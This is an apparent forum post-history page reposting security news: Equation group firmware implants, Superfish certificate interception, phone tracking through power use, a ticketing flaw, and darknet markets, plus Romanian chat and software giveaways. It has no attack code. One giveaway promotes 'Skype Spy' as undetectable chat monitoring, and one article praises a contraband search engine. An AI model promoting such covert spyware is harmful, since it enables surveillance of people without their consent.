about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. “Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. “[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.” Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. Source
  6. Aerosol
    Burning Man has practically gone mainstream. The once-fringe desert camping festival is now cultural fodder for The Simpsons and Taco Bell commercials. Celebrities and CEOs routinely attend. So it’s no surprise that 40,000 Burning Man tickets sold out in less than an hour last Wednesday when they went on sale. But software engineers in Silicon Valley hacked into the Burning Man ticketing system powered by Ticketfly to cut to the front of the queue. Who needs luck when you have engineering skills and you’re willing to use ‘em for your advantage? Well, apparently everyone. Burning Man officials, not ones to let cosmic karma pass them by, announced on Friday that they will find and cancel the hacked ticket orders. “The good news (for us, not them) is that we can track them down, and we’re going to cancel their orders,” according to Megan K. Miller, Burning Man’s director of communications. “Steps are being taken to prevent this from happening again in future sales.” While 80,000 would-be Burners all over the world waited their turn in a so-called “first come first serve” online queue to purchase tickets, 200 software-savvy engineers discovered a design flaw on the ticket page that allowed them to generate a spot ahead of everyone else in line. During the ticket sale, Rob Banagale, the San Mateo-based founder of the Gliph messaging app, tweeted that he had “figured out a hack” to get to the front of the line and had the screenshot to prove it. Similarly, Jonathan Hart, a software engineer at Idle Games in San Francisco, tweeted that he had somehow navigated Ticketfly’s web servers and “crawled out” with two tickets to Burning Man. During the ticket sale, more reports continued to surface on social media claiming Ticketfly had somehow been susceptible to hacking. Even before tickets officially sold out, the perception that hackers were cheating the system was so prevalent that it quickly became a source of both resentment and parody among Twitter users. On Thursday, Burning Man’s top brass released a statement after compiling technical information from Ticketfly, confirming that a backdoor had been created by hackers. “Approximately 200 people created a technical ‘backdoor’ to the sale and made their way to the front of the line,” according to the statement. “Absolutely no tickets were sold before the sale opened, but they were able to purchase the first batch of tickets when the sale started.” Several engineers and web developers on a Burning Man Reddit thread speculated that hackers were able to create this backdoor after discovering a few lines of JavaScript code on the ticketing website that gave preeminent access to tickets three minutes before they officially went on sale at noon on Wednesday. “They left code in the page that allowed you to generate the waiting room URL ahead of time,” said Michael Vacirca, a software engineer at a large defense corporation. “If you knew how to form the URL based on the code segment then you could get in line before everyone else who clicked right at noon.” Burning Man admits the error and says those hacked tickets will be put back up for grabs during the scheduled last-minute sale in August. The Burning Man ticket distribution system has always been met with its fair share of criticism. Whether the tickets were distributed via a lottery system or a website that kept on crashing, the fact is that there have never been enough tickets to meet the demand. There will always be those Burning Man hopefuls who feel like they’ve been cheated out of their destined spot to adult Disneyland. The way this year’s sale operated, however, didn’t help to dissipate the resentment. Those interested in purchasing tickets were placed in an online queue as each sale was processed and given a time estimate as to how long they would be kept waiting before they could purchase tickets. The time estimates kept shifting, going from an 24 minute wait, to 46 minutes, back down to 18 minutes, to then “more than an hour,” which might as well have read, “abandon all hope ye who enter here.” At one point, the line was inexplicably “paused” for several minutes, causing another nerve-wracking moment on social media. This drastic, back-and-forth change in wait times gave those in line the illusion that somehow hackers were cutting in front of them and bumping them out of scoring tickets. Burning Man’s social media team responded by saying that the wait times fluctuated based on how long it took each buyer to complete the purchase. It surely didn’t qualm any anxiety to have used such an unpredictable factor as a counter, instead of a fixed number (“There are 39,999 people in front of you trying to buy tickets”). This is not the first time Silicon Valley has been criticized for tampering with Burning Man’s ideals and processes. Last year’s festival garnered unflattering feedback from Burning Man die-hards after venture capitalists, executives and celebrities descended on the desert with air-conditioned camps, personal assistants and other VIP-perks. In recent years, Larry Page, Sergey Brin, Elon Musk, Jeff Bezos and Mark Zuckerberg have all scored tickets to Burning Man. It seems like now, Silicon Valley is leveraging more than its money to get in front of the line. Source
  7. Aerosol
    Facebook security researcher Matt Richard says The Social NetworkTM has found at least ten more outfits using the library that gave the Superfish bloat/ad/malware its nasty certificate-evading powers. Richard, a “threats researcher” on Facebook's security team, writes that in 2012 Facebook “... started a project with researchers from Carnegie Mellon University to measure how prevalent SSL MITM.” That effort, he says, found “certain deep packet inspection (DPI) devices were using the same private key across devices, which can be exploited by an attacker with the capacity to extract the key from any single device.” “Superfish is similar in that it uses the same private key across all clients, but it's more dangerous because its root certificate is installed on significantly more clients than those behind the vulnerable DPI devices.” The post goes on to say that the fake certificates Superfish issued for Facebook “used weak 1024-bit RSA keys and were directly signed by the universal root certificate with no intermediate certificates in the chain.” The researcher also says the Facebook's probe into Superfish has revealed another ten outfits using the same Kommodia library that gives the Lenovo-spawn its cert-jacking powers. The operators listed in the post are: CartCrunch Israel LTD WiredTools LTD Say Media Group LTD Over the Rainbow Tech System Alerts ArcadeGiant Objectify Media Inc Catalytix Web Services OptimizerMonitor “We can’t say for certain what the intentions of these applications are, but none appear to explain why they intercept SSL traffic or what they do with data,” Richard writes, also suggesting that “the Komodia library is easy to detect” for the following reasons: “In our research, we found that the software that installs the root CA contains a number of easily searchable attributes that enabled us to match up the certificates we see in the wild with the actual software. These functions, which are Windows PE exports, include 'CertInstallAll', 'GetCertPEMDLL', 'InstallFirefoxDirectory', 'SetCertDLL', and 'SetLogFunctionDLL.' Most of these libraries are designed to work on Windows 8 and will not install on older operating systems.” Source
  8. Aerosol
    Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found. A smartphone uses more power the further away it is from a cellular base and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption. "The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data. "These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim." There are 179 apps currently available on Android app store Google Play that request this information, the team add. Activity such as listening to music, activating maps, taking voice calls or using social media all drain the battery but this can be discounted due to "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise." The tests were carried out on phones using the 3G network but did not measure signal strength as that data is protected by the device. 'Stuffed with sensors' "With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. "I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras. "This latest work shows that even that basic characteristics (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that." Source
  9. Aerosol
    Cisco has announced that NCS 6000 and Carrier Routing System (CRS-X) – heavy hunks of iron used in the service provider market – have an IPv6 software bug that needs patching. The bug impacts the ways Cisco IOS XR units parse IPv6 packets and an attack exploiting the problem could result in a forced restart of the line card that's processing the traffic. “An attacker could exploit this vulnerability by sending a malformed IPv6 packet, carrying extension headers, through an affected Cisco IOS XR device line card,” the company's advisory states. “This vulnerability could be exploited repeatedly to cause an extended DoS condition.” Of course, it's only a problem if you're actually processing IPv6 traffic using the vulnerable IOS XR software. It's also restricted to traffic that's transiting the affected device: traffic transiting the device on the way somewhere else won't trigger the bug. For the Cisco NCS 6000, all versions of the IOS XR software except 5.3.2 are affected. For IOS XR for CRS-X, all versions that support CRS-X line cards, including the 400 Gbps Modular Service Card (MSC) and 400 Gbps Forwarding Processor Cards, the safe version is 5.3.0 – all other versions are vulnerable. The bug has been designated CVE-2015-0618. Source
  10. Aerosol
    Lenovo has teamed up with Microsoft and McAfee to remove the Superfish adware from its machines, following concerns about security. Lenovo announced the partnerships in a public statement, promising that the tools will let users automatically block and remove the insecure, self-signing certificates used by Superfish. "We are working with McAfee and Microsoft to have the Superfish software and certificate quarantined or removed using their industry-leading tools and technologies," the firm said. "These actions have already started and will automatically fix the vulnerability even for users who are not currently aware of the problem." The Microsoft removal tool will be integrated into Windows Defender version 1.193.444.0. The tools are the latest step in Lenovo's bid to allay customer concerns that the firm put personal data at risk. The problem erupted on the Lenovo forum earlier in February when several customers reported finding Superfish installed on their machines. Superfish is adware that collects data such as web traffic information using fake, self-signed root certificates and then uses it to push advertisements to the user. Lenovo claims that the adware is installed on only a limited number of machines and does not affect its business-focused Thinkpad line. "We ordered Superfish preloads to stop and had server connections shut down in January based on user complaints about the experience," read the statement. "While this issue in no way impacts our ThinkPads, any tablets, desktops or smartphones, or any enterprise server or storage device, we recognise that all Lenovo customers need to be informed." Lenovo apologised for causing concern, but argued that the company never knowingly compromised its customers' privacy. "We apologise for causing these concerns among our users. We are learning from this experience and will use it to improve what we do and how we do it in the future," read the statement. "Superfish technology is purely based on contextual/image and not behavioural. It does not profile or monitor user behavior. It does not record user information. It does not know who the user is. Users are not tracked nor re-targeted." Lenovo is one of many firms dealing with privacy and security concerns. Researchers at FireEye reported on 20 February that Apple had ignored a dangerous flaw in the iOS operating system, codenamed Masque Attack II. Source
  11. Aerosol
    @Bosketar. da am vazut jos cu rosu Deal Expires in: 1 day(s) 9 hour(s) si am crezut ca a expirat de aia am re-postat programul. On: vad ca au prelungit oferta pentru inca 1 zi.
  12. Aerosol
    @Maverick preturile de acum sunt destul de ok ( dupa ce le-ai scazut ) ce sa zic bafta cu site-ul. Oricum o sa fie greu la inceput ( fiindca sunt foarte multi ce ofera servicii similare la preturi extrem de mici fiindca isi permit ) Ar fi ok sa faci si ceva gen "50 likes/votes free" daca aduci 10 clienti! "reclama contra reclama"
  13. Aerosol
    Skype Spy USB Edition software allows you to monitor and track all Skype chats and activities, such as file transfers or calls. You can search monitored Skype data, make copies of data, and restore the data as well. Best of all, Skype Spy USB Edition is portable — you can easily run it from USB flash drive and use it on any computer without installation. In this way the app stays completely undetectable. It is a great option for anyone looking for an effective parental control solution or employee monitoring software. Free Skype Spy USB Edition (100% discount) Inca 4 zile si expira.
  14. Aerosol
    PowerISO is a powerful CD / DVD / BD disc image file processing tool that allows you to open, extract, burn, create, edit, compress, encrypt, split and convert ISO files, and mount ISO files with internal virtual drive. It can process almost all CD / DVD / BD disc image files (ISO, BIN, NRG, CDI, DAA, and so on). PowerISO provides an all-in-one solution for disc image management needs. Free PowerISO (100% discount) Promotia se termina in 15h.
  15. Aerosol
    A mai fost postat pe aici de Usr6 insa acea oferta a expirat, uite ca vin si eu cu una noua. Free OkayFreedom VPN Premium (100% discount) grabiti-va!
  16. Aerosol
    Privacy International (PI) is calling on people to sign up to be part of a mass request for confirmation they have been spied on by Five Eyes spy agencies and to demand the removal of captured information. Would-be signatories are being asked to submit their name and email address to the organisation, which will then pass them on to Britain's Investigatory Powers Tribunal tasked with determining if the sharing of NSA-intercepted material with the UK's GCHQ spy agency was illegal. The requests would cover a prodigious amount of data numbering billions of records hoovered up by the NSA and shared with the GCHQ until December last year. PI will not reveal if agencies other than the NSA collected data, and would cover only that shipped to the GCHQ. This could conceivably include data captured by any Five Eyes agency and shared with the GCHQ via the NSA. The offer came on the heels of the tribunal's ruling this month in favour of Privacy International that the mass funnelling of intelligence information between Britain and the United States was illegal prior to December. That decision made on the grounds that rules governing the exchange were secret opened an avenue for users to request the tribunal examine and notify if their data was illegally obtained and, if found in breach, for the information to be destroyed. The British charity dubbed the ruling a "major victory against the Five Eyes" group of nations which includes Australia, New Zealand and Canada, and said it was possible only due to the flurry of NSA leaks from Edward Snowden. "Through their secret intelligence sharing relationship with the NSA, GCHQ has had intermittently unrestricted access to PRISM - NSA's means of directly accessing data and content handled by some of the world’s largest Internet companies, including Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube and Apple," deputy director Eric King said at the time. "GCHQ's access to NSA material therefore makes up the large bulk of all surveillance material handled by the security services; some ex- GCHQ staffers estimated that 95 per cent of all signals intelligence material handled at GCHQ is American. "The extraordinary implications of [the] judgement is that all historical sharing of raw intelligence between NSA and GCHQ took place without an adequate legal framework, and thus was unlawful." The Tribunal will likely be swamped if the campaign takes off. Probes could trawl records collected from NSA programmes UPSTREAM, CO-TRAVELLER, and DISHFIRE, the former having intercepted some 160 billion records from its top five programmes in one month alone. Privacy International said requests could take years to be fulfilled. New requests could be made to discover the data collected by individual agencies to current day if the charity was successful in its appeal with the European Court of Human Rights against the decision that the data shared between the US and UK spy agencies was kosher due to the policies of the arrangement being made public as a result of the legal action Source
  17. Aerosol
    +Vid US President Barack Obama has come out forcefully in favour of strong encryption despite the opposition of his intelligence establishment. Encryption has been a hot topic over recent weeks with Western law enforcement and intelligence agencies complaining about encryption-by-default in modern communication tools such as smartphones. Prime Minister David Cameron recently began pushing the idea of banning crypto products that UK spies are unable to access, an idea he first floated in a recent speech before lobbying US President Barack Obama on the issue, seemingly unsuccessfully. In an interview with Re/code, Obama said that he’s a ”strong believer in strong encryption," adding, "I lean probably further on side of strong encryption than some in law enforcement”. “Ultimately everybody, and certainly this is true for me and my family, we all want to know that if we’re using a smartphone for transactions, sending messages, having private conversations, that we don’t have a bunch of people compromising that process,” Obama explained. “There’s no scenario in which we don’t want really strong encryption.” The president went on to claim that public concern about stymieing terrorism investigations is behind legislators' concerns about encryption. “Where there is a situation in which we’re trying to get a specific case of a possible national security threat — is there a way of accessing it? If it turns out it’s not, then we’re really gonna have to have a public debate,” Obama said. “And, you know, I think some in Silicon Valley would make the argument that the harms done by having any kind of compromised encryption are far greater.” Obama also conceded that the ongoing Snowden disclosures have affected relations between Silicon Valley and the US government. “The Snowden disclosures were really harmful in terms of the trust between the government and many of these companies, in part because it had an impact on their bottom lines. A transcript of the full interview, which also covered cyber warfare and a variety of other hi-tech topics, can be found here. A video clip of a segment of the interview where Obama talks about encryption can be found at the top of this story. Despite the furore over the recent megahack on Sony, which the US government blames on North Korea, Obama dismissed the NORKs as no great shakes when it came to offensive cyber warfare, while stating that “China and Russia are very good [and] Iran is good.” Source
  18. Aerosol
    Eh oricum postul e clar un atac asupra SUA cum a spus si Nytro, cat despre marketing puteau sa gaseasca orice... @Nytro exact cum a fost faza cu Kaspersky acum 1 an.
  19. Aerosol
    @AGSQ nu a aparut la search bre si mna l-am postat ( oricum el l-a postat pentru download, eu l-am postat direct pe site pentru cei ce nu au timp sa-l descarce deci e ok. )
  20. Aerosol
    Good news for Internet folks! Get Ready as the entire web you know is about to change. The new and long-awaited version of HTTP took a major step toward becoming a reality on Wednesday – It is been officially finalized and approved. Mark Nottingham, chairman of the Internet Engineering Task Force (IETF) working group behind creating the standards, announced in a blog post that the HTTP 2.0 specifications have been formally approved. Now, the specifications will go through a last formality – Request for comment and editorial processes – before being published as a standard. LARGEST CHANGE IN HTTP OVER LAST 16 YEARS HTTP, or Hypertext Transfer Protocol, is one of the web standards familiar to most as the http:// at the beginning of a web address. HTTP protocol governs the connections between a user’s browser and the server hosting a website, invented by the father of the web Sir Tim Berners-Lee. HTTP/2 is simply an update to the protocol, but is really a huge deal because the last time the HTTP specification was updated back in 1999. This means the HTTP/2 will be the first major update to the HTTP standard over the last 16 years, marking the largest change since 1999 when HTTP 1.1 was adopted that underpins the World Wide Web as we know it today. WHAT IS HTTP/2 ? HTTP/2 promises to deliver Web pages to browsers faster, allowing online users to read more pages, buy more things and perform more and faster Internet searches. HTTP/2 is based on SPDY protocol, a protocol introduced by Google in 2009 and adopted by some technologies including Google's own Chrome browser, Mozilla's Firefox, Microsoft's Internet Explorer, many websites such as Facebook, and some of the software that delivers Web pages to browsers. SPDY (fittingly pronounced "speedy") was designed to speed up the loading of web pages and the browsing experience of the online users. Both SPDY and HTTP/2 use "header field compression" and "multiplexing" to let browsers make multiple requests to web servers via a single connection. BROWSE EVERYTHING FASTER HTTP/2 won’t replace the traditional web standard what the world knows and loves, but it is expected to help websites load faster and more securely once it’s adopted a wide scale. PUSHES ENCRYPTION HTTP 2.0 also brings another big change – Encryption. It was originally planned to push encryption technology called TLS (Transport Layer Security, formerly called SSL for Secure Sockets) in HTTP/2, but this was rejected because of inconvenience to certain network operators and proxy vendors by burdening them with new standards. However, when Firefox and Chrome developers said that they won't support HTTP/2 unless it does support encryption. Therefore, Nottingham says, sites that want to get the benefit of faster browsing "will need to use TLS if they want to interoperate with the broadest selection of browsers." WHEN WILL USERS GET HTTP/2 ? As the specification of the HTTP/2 standard is finalized and approved, after going through some editorial processes HTTP/2 will be published and ready for adoption. Well, to enjoy HTTP/2 on Internet depends on websites, hosting services and companies such as Google to implement the standard. For its part, Google already announced that it will adopt HTTP/2 in Chrome by early 2016. Users can also expect Firefox to follow suit, as well. More information is available in the HTTP/2 FAQ. Source
  21. Aerosol
    There is an entire section of the Internet that you probably don’t see on daily basis, it’s called the "Darknet" or "Deep Web", where all browsing is done anonymously. About a week ago, we reported about the 'Memex' Deep Web Search Engine, a Defense Advance Research Projects Agency (DARPA) project to create a powerful new search engine that could find things on the deep web that isn't indexed by Google and other commercial search engines, but it isn't available to you and me. Now, there is another search engine that will let anyone easily search the Deep Web for large swaths of information for free, and without an application; you only need is an Internet connection. Onion.City, a new search engine for online underground markets that makes it more easier to find and buy drugs, guns, stolen credit cards directly from your Chrome, Internet Explorer or Firefox browser without installing and browsing via Tor Browser. Just two days after Memex story came to light, Virgil Griffith announced Onion.City Deep Web search engine onto the Tor-talk mailing list, that actually gives you the feel of a normal search engine, but can search the ".onion" domains on Deep Web and throw up results on your normal browser. ONION.CITY — SEARCH ENGINE FOR TOR ONION SITES Onion.City darknet search engine is powered using Tor2web proxy which enables it to access deep into the anonymous Tor network, finds ".onion" sites by aggregating the hidden marketplaces and makes them available to the normal web browser with easiest navigation. Tor Network is one of the most well-known Darknets, where web addresses on the Tor network follow the form of a random string of letters followed by the ".onion" suffix and are only accessible through the Tor browser. Online users visit and run so-called hidden services on ".onion" domains or deep web, but the way to get around the ".onion" websites is to first have a Tor browser. However, Onion City darknet search engine made it easy and effective for Internet users in order to search on the deep web from our favorite, insecure web browser. Those who aren't much familiar with the Deep Web can read our wonderful and detailed article on "What is the Deep Web? A first trip into the abyss". GRAMS — BLACK MARKET SEARCH ENGINE However, Onion.city isn't the first ever Deep Web search engine. Last year, the first search engine for online underground Black Markets, called Grams, was launched that lets anyone to easily find illegal drugs and other contraband online in an easier way ever and it's pretty fast like Google Search Engine. Such a search engine like Grams and Onion.city are mostly considered to be illegal or illicit, but not every website on the Deep Web is dubious. The Frequently Asked Questions (FAQs) on Onion.City website even provides an email address to report content that may be illegal, though it's unclear exactly what steps they’ll take. For now, leaving controversies aside, Onion.city seems to be a nice and effective Deep Web search engine for providing a means for regular web users to search things they would otherwise have to work a little harder to find. Source
  22. Aerosol
    An all new anonymous online underground black market website, DarkLeaks, has been introduced on the Internet where Whistleblowers, blackmailers, hackers and any individual can trade/sell sensitive and valuable data/secrets anonymously in exchange for Bitcoin payments. DarkLeaks is a decentralized underground blackmarket which is built on top of the Bitcoin Blockchain technology and is available on the Internet to download as a free software package together with its source code published openly on code-sharing site Github. TRADE INFORMATION ANONYMOUSLY DarkLeaks underground black market website is masterminded by the members of crypto-anarchist collective System. "There is no identity, no central operator and no interaction between leaker and buyers," the developers' statement says. Blockchain technology is developed for secure Bitcoin payments, where users can make transactions directly without need of any intermediary. Blockchain encrypts the files which are released when payment is claimed by the leaker. NO LIMITS TO TRADE CONTENTS The developers of DarkLeaks underground black market website said that it is the best tool to trade any kind of secret, illegal or confidential, but valuable data, including media, information, video, data and documents. The list of contents that can be shared is as follows: Hollywood movies Trade secrets Government secrets Proprietary source code Industrial designs like medicine or defence Zero day exploits Stolen databases Proof of tax evasion Military intelligence Celebrity sex pictures Corruption HOW DOES DARKLEAKS WORK ? The files on sale are encrypted by DarkLeaks black market website, broken into smaller pieces, and then added to Bitcoin's block chain. However, the service allows the buyer to verify small preview piece of the file before payment is claimed. After buyer purchase the rest of the file when satisfied with the contents, the seller claims their Bitcoins. A decryption key is provided to the buyer in order to unlocks the encrypted document for the buyer. "The mechanism involved makes the environment free from intervention." DON'T BE AFRAID, JOIN HANDS WITH US The concept is different, but isn't new, as many existing portals, such as the infamous WikiLeaks, used for sharing secret information by whistleblowers and others, but has never been an opportunity to exchange those information for profit. However, DarkLeaks is taking things to the next level, making the information sharing portal a direct purchase transaction. The developers say that Darkleaks will help "stop corruption and challenge power", and at the same time encourage users by saying, "Don't be afraid. Come join the revolution and reclaim your freedom. The gloves are off. The revolt has begun." source
  23. Aerosol
    Table of contents 1. What is the Equation group?..........................................................................3 2. Why do you call them the “Equation” group?................................................3 3. What attack tools and malware does the*Equation group use? ..................4 4. What is DOUBLEFANTASY?.............................................................................6 5. What is EQUATIONDRUG? ..............................................................................8 6. What is GRAYFISH?.........................................................................................9 7. What is Fanny?............................................................................................. 12 8. What exploits does the Equation group*use?............................................. 14 9. How do victims get infected by EQUATION group malware?...................... 15 10. What is the most sophisticated thing about the EQUATION group? ......... 16 11. Have you observed any artifacts indicating who is behind the*EQUATION*group?.................................................................................. 19 12. How many victims are there?...................................................................... 20 13. Have you seen any non-Windows malware from the Equation group?..... 22 14. What C&C infrastructure do the Equation group implants use? ............... 23 15. How do victims get selected for infection by the EQUATION group?......... 23 16. What kind of encryption algorithms are*used by the EQUATION group?... 27 17. How does the EQUATION group’s attack platforms compare with Regin?................................................................................... 30 18. How did you discover this malware? .......................................................... 31 Indicators of compromise (“one of each”) ......................................................... 32 Read more here: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
  24. Aerosol
    Am cautat pe forum si nu l-am gasit postat asa ca am zis sa-l postez ( bine inteles pentru cei interesati ) Adversaries are committed to continually rening or developing new techniques that can evade detection and hide malicious activity. Meanwhile, the defenders—namely, security teams—must constantly improve their approach to protecting the organization and users from these increasingly sophisticated campaigns. Caught in the middle are the users. But now, it appears they not only are the targets, but also the complicit enablers of attacks. The Cisco 2015 Annual Security Report, which presents the research, insights, and perspectives provided by Cisco® Security Research and other security experts within Cisco, explores the ongoing race between attackers and defenders, and how users are becoming ever-weaker links in the security chain. Cybersecurity is a broad and complex topic that has a far-reaching impact on users, companies, governments, and other entities around the world. The Cisco 2015 Annual Security Report is divided into four areas of discussion. These sections, and the issues explored within them, may at rst glance seem disparate, but closer examination reveals their interconnectedness: Read more: https://www.cisco.com/web/offer/gist_ty2_asset/Cisco_2015_ASR.pdf
  25. Aerosol
    Contents Author BIOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Executive Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 What is Pen-Testing? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Pen-Testing vs. Vulnerability Assessment . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 How Vulnerabilities Are Identified . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Why Perform Pen-Testing? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Find Holes Now Before Somebody Else Does. . . . . . . . . . . . . . . . . . . . . . . . . 5 Report Problems To Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Verify Secure Configurations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Security Training For Network Staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Discover Any Gaps In Compliance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Testing New Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Pen-Testing Tools And Reporting . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Reconnaissance Tools: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Nessus. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Packet Manipulation and Password Cracking Tools . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Exploitation Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Metasploit Version 2.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 SecurityForest Exploitation Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 CORE IMPACT (version 5.1) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 The Penetration Testing Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 Analysis Of CORE IMPACT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 Test Lab Network Diagram. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 Detailed Review Of Test Lab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 Review Of CORE IMPACT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Conclusion. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Metasploit Framework 3.0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Read more: http://www.sans.org/reading-room/whitepapers/analyst/penetration-testing-assessing-security-attackers-34635
×
×
  • Create New...